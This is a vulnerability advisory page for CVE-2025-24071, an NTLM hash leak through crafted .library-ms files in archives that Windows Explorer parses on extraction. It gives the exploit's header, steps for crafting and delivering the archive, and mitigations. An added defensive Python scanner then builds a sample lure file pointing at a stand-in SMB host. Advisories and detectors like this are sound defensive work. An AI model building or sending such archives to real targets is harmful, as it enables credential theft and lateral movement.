Windows Explorer - NTLM Hash Disclosure via .library-ms in ZIP Archive
A vulnerability in Windows 10/11 allows a user's NTLMv2 hash to be leaked automatically through a ZIP or RAR archive containing a specially crafted .library-ms file. When such an archive is extracted, Windows Explorer connects on its own to an attacker-controlled SMB server, leaking the hash and enabling an information disclosure attack. 2025-6-4 08:56:17 Author: cxsecurity.com


#!/usr/bin/env python3
# Exploit Title: Windows Explorer - NTLM Hash Disclosure via .library-ms in ZIP Archive
# Exploit Author: Mohammed Idrees Banyamer
# Twitter/GitHub: @mbanyamer
# Date: 2025-05-27
# CVE: CVE-2025-24071
# Vendor: Microsoft
# Affected Versions: Windows 10/11 (All supporting .library-ms and SMB)
# Tested on: Windows 11 (23H2)
# Type: Local / Remote (NTLM Leak)
# Platform: Windows
# Vulnerability Type: Information Disclosure
# Description:
# Windows Explorer automatically initiates an SMB authentication request when a
# .library-ms file is extracted from a ZIP archive. This causes NTLM credentials
# (in hashed format) to be leaked to a remote SMB server controlled by the attacker.
# No user interaction is required beyond extraction.
# Country: Jordan

Description:
CVE-2025-24071 is a vulnerability that allows attackers to capture a victim's NTLMv2 hash automatically upon extracting a specially crafted RAR or ZIP archive containing a .library-ms file. This file references an attacker-controlled SMB path within its <simpleLocation> tag. Once the archive is extracted, Windows Explorer and the Windows Search Indexing service (SearchProtocolHost.exe) automatically parse the .library-ms file to generate metadata, icons, or previews. This parsing process initiates an unsolicited SMB connection to the attacker's server, resulting in the NTLMv2 hash of the victim being sent without any user interaction.

Impact:
- NTLMv2 hash disclosure
- Enables pass-the-hash attacks
- Facilitates lateral movement within internal networks

Exploitation Steps:
1. Create a .library-ms file pointing to a remote SMB share.
2. Compress it into a RAR or ZIP archive.
3. Deliver the archive to the target.
4. Upon extraction, the victim's system initiates an SMB request to the attacker, leaking the NTLM hash.

Requirements:
- Windows system with Explorer and Indexing Services enabled
- Outbound SMB traffic not restricted

Mitigation:
- Block outbound SMB (ports 445 and 139)
- Disable Windows Search Indexing if unnecessary
- Avoid extracting archives from untrusted sources
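As an added defensive example (not part of the advisory above, and not the author's code), the following Python scanner inspects a ZIP archive before extraction and flags any .library-ms entry whose <simpleLocation> URL points at a remote share, which is the condition the advisory describes. The sample archive, its entry names and the documentation-range host 203.0.113.10 are constructed for the demonstration only.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# A UNC path (\\host\share) or an smb:// / file://host URL, i.e. a location that is not local.
_REMOTE_URL = re.compile(r"^\s*(\\\\[^\\]+\\|(?:smb|file)://[^/])", re.IGNORECASE)

def library_ms_remote_urls(xml_bytes):
    """Return every <url> under a <simpleLocation> that points at a remote share.
    Tags are matched by local name so the library namespace does not matter;
    returns None when the XML does not parse (treat that as suspicious as well)."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return None
    found = []
    for elem in root.iter():
        if elem.tag.rsplit("}", 1)[-1] != "simpleLocation":
            continue
        for child in elem.iter():
            if child.tag.rsplit("}", 1)[-1] == "url" and child.text and _REMOTE_URL.match(child.text):
                found.append(child.text.strip())
    return found

def scan_zip(data):
    """Scan an in-memory ZIP for .library-ms entries that reference a remote location.
    Returns (entry name, url) pairs; an unparseable entry is reported with url None."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            urls = library_ms_remote_urls(zf.read(info))
            findings.extend([(info.filename, None)] if urls is None else [(info.filename, u) for u in urls])
    return findings

def build_sample_zip():
    """Constructed input: one library-ms pointing at a documentation-range host, one at a local folder."""
    ns = "http://schemas.microsoft.com/windows/2009/library"
    def lib(url):
        return (f'<libraryDescription xmlns="{ns}"><searchConnectorDescriptionList>'
                f'<searchConnectorDescription><simpleLocation><url>{url}</url></simpleLocation>'
                '</searchConnectorDescription></searchConnectorDescriptionList></libraryDescription>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/Invoice.library-ms", lib("\\\\203.0.113.10\\share"))   # flagged
        zf.writestr("docs/Local.library-ms", lib("C:\\Users\\Public\\Documents"))  # local, not flagged
        zf.writestr("readme.txt", "unrelated content")
    return buf.getvalue()
```

The scanner only recognises .library-ms entries by extension; it complements, and does not replace, blocking outbound SMB on ports 445 and 139 at the perimeter.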
Article source: https://cxsecurity.com/issue/WLB-2025060002